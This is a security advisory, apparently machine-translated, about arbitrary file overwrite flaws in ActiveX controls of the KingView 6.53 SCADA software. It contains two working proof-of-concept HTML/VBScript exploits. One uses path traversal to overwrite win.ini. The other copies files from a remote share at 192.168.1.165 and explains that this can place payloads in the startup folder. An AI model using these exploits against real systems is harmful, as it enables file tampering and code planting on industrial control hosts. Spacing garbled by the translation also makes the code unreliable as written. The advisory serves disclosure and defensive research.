WellinTech KingView ActiveX Multiple Arbitrary File Overwrite Vulnerability

Release date: 2013-09-04
Updated on:

Affected Systems:
Wellintech King View 6.53
Description:
--------------------------------------------------------------------------------
Bugtraq id: 62419

Kingview is the first SCADA product for monitoring and controlling automation devices and processes for Small and Medium-sized projects launched by the Asian Control Corporation.

KingView 6.53 does not properly filter user input. Multiple Arbitrary File overwrites exist in the implementation. Attackers can save arbitrary files on the affected application context computer.

<* Source: Blake

Link: http://ics-cert.us-cert.gov/alerts/ICS-ALERT-13-256-01
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<! --
KingView ActiveX Control (KChartXY) Remote File Creation/Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53.
Tested on: Windows XP SP3/IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib. KChartXY
Path: C: \ Program Files \ KingView \ KChartXY. ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented

Description: Proof of concept overwrites the win. ini file
-->
<Html>
<Object classid = 'clsid: A9A2011A-1E02-4242-AAE0-B239A6F88BAC 'id = 'target'> </object>
<Script language = 'vbscript'>

Arg1 = ".. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \.. \ WINDOWS \ win. ini"

Target. SaveToFile arg1

</Script>

<Html>
<Object classid = 'clsid: F494550F-A028-4817-A7B5-E5F2DCB4A47E 'id = 'target'> </object>
<! --
KingView Insecure ActiveX Control-SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53.
Tested on: Windows XP SP3/IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib. SuperGrid
Path: C: \ Program Files \ KingView \ SuperGrid. ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<Title> KingView Insecure ActiveX Control Proof of Concept-SuperGrid. ocx </title>
<P> This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder ). it can also be used to overwrite existing files. </p>

<Input type = button onclick = "copyfile ()" value = "Do It! ">
<Script>
Function copyfile ()
{
Var file1 = "\\\\ 192.168.1.165 \\ share \\ poc.txt"; // source
Var file2 = "c: \ WINDOWS \ poc.txt"; // destination
Result = target. ReplaceDBFile (file1, file2 );
}

</Script>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Wellintech
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.kingview.com/products/detail.aspx? Contentid = 24